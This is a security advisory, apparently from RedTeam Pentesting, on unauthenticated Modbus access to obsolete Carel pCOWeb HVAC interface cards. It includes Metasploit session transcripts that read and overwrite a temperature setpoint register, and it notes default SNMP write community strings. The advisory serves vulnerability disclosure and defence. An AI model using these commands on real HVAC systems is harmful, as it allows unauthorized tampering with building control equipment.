Carel pCOWeb HVAC Modbus Interface Authentication Bypass

`Advisory: Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC  
  
As part of it's features, the Carel pCOWeb card exposes a Modbus  
interface to the network. By design, Modbus does not provide  
authentication, allowing to control the affected system.  
  
  
Details  
=======  
  
Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface  
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others  
Fixed Versions: product obsolete  
Vulnerability Type: Unauthenticated Access  
Security Risk: high  
Vendor URL: https://www.carel.com/product/pcoweb-card  
Vendor Status: notified / product obsolete  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-14  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"The pCOWeb card is used to interface the pCO Sistema to networks that  
use the HVAC protocols based on the Ethernet physical standard, such as  
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated  
Web-Server, which both contains the HTML pages relating to the specific  
application and allows a browser to be used for remote system  
management."  
(from the vendor's homepage)  
  
It is used as an OEM module in several different HVAC systems and  
considered obsolete by the vendor.  
  
  
More Details  
============  
  
While authentication is required to access the web interface (compare  
advisory rt-sa-2019-013 [0]) no authentication is necessary for using  
the Modbus interface on TCP port 502, since the Modbus protocol did not  
offer any authentication mechanism during the device's lifetime.  
The addition of encryption and authentication was only recently proposed  
by the Modbus Organization [1].  
  
It is believed that this might be analogous to the problem described in  
CVE-2019-13549 for the special case of Rittal SK 3232 products. Other  
OEMs are affected, too.  
  
  
Proof of Concept  
================  
  
The web interface of the Carel pCOWeb card allows authenticated users to  
read and write many variables of the system via the URL  
  
http://192.168.0.1/config/adminpage.html  
  
This web page seems to provide access to all Modbus variables using  
large tables of variables 1-207 for digital, analog and integer  
variables, respectively.  
  
By accessing TCP port 502 (Modbus to TCP), it is possible to access  
these variables without authentication. This can be done, for example,  
by using the Metasploit [2] modbusclient [3] module:  
  
------------------------------------------------------------------------  
msf5 > use auxiliary/scanner/scada/modbusclient  
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1  
RHOSTS => 192.168.0.1  
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10  
DATA_ADDRESS => 10  
msf5 auxiliary(scanner/scada/modbusclient) > run  
  
[*] 192.168.0.1:502 - Sending READ REGISTERS...  
[+] 192.168.0.1:502 - 1 register values from address 10 :  
[+] 192.168.0.1:502 - [240]  
[*] Auxiliary module execution completed  
------------------------------------------------------------------------  
  
The returned value matches the set temperature of 24°C multiplied by  
ten, as the variable can only hold integers. Using the same module, it  
is possible to change the temperature setpoint, too:  
  
------------------------------------------------------------------------  
msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER  
ACTION => WRITE_REGISTER  
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241  
DATA => 241  
msf5 auxiliary(scanner/scada/modbusclient) > run  
  
[*] 192.168.0.1:502 - Sending WRITE REGISTER...  
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10  
[*] Auxiliary module execution completed  
------------------------------------------------------------------------  
  
This allows unauthenticated remote attackers to reconfigure the device.  
  
Depending on OEM integration, different variables might represent  
different settings.  
  
Additionally, the system provides SNMP (UDP Port 161) write access with  
the SNMP community string "public" or "carel" (depending on version) as  
documented in the manual [4] and BACnet over IP (UDP Port 47808).  
  
Workaround  
==========  
  
The Carel pCOWeb card should not be connected to networks accessible by  
untrusted users.  
  
  
Fix  
===  
  
No updated firmware will be published for pCOWeb Cards, as they are  
obsolete since Dec 2017. A successor hardware with current firmware is  
available for OEM integrators.  
  
  
Security Risk  
=============  
  
Since the Modbus protocol implemented in the Carel pCOWeb card does not  
offer auhtentication, it is not possible to limit access to the system  
to authorized users, allowing attackers to control the system if the  
device is accessible via the network. This is considered to pose a high  
risk in context of the Carel pCOWeb card.  
  
  
Timeline  
========  
  
2019-07-17 Vulnerability identified  
2019-08-03 Customer approved disclosure to vendor  
2019-09-02 Vendor notified  
2019-09-09 Vendor did not respond as promised  
2019-09-17 Vendor could not be reached  
2019-09-18 Vendor could not be reached  
2019-10-28 Advisory published due to publication of CVE-2019-13549  
  
  
References  
==========  
  
[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt  
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf  
[2] https://www.metasploit.com/  
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient  
[4] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`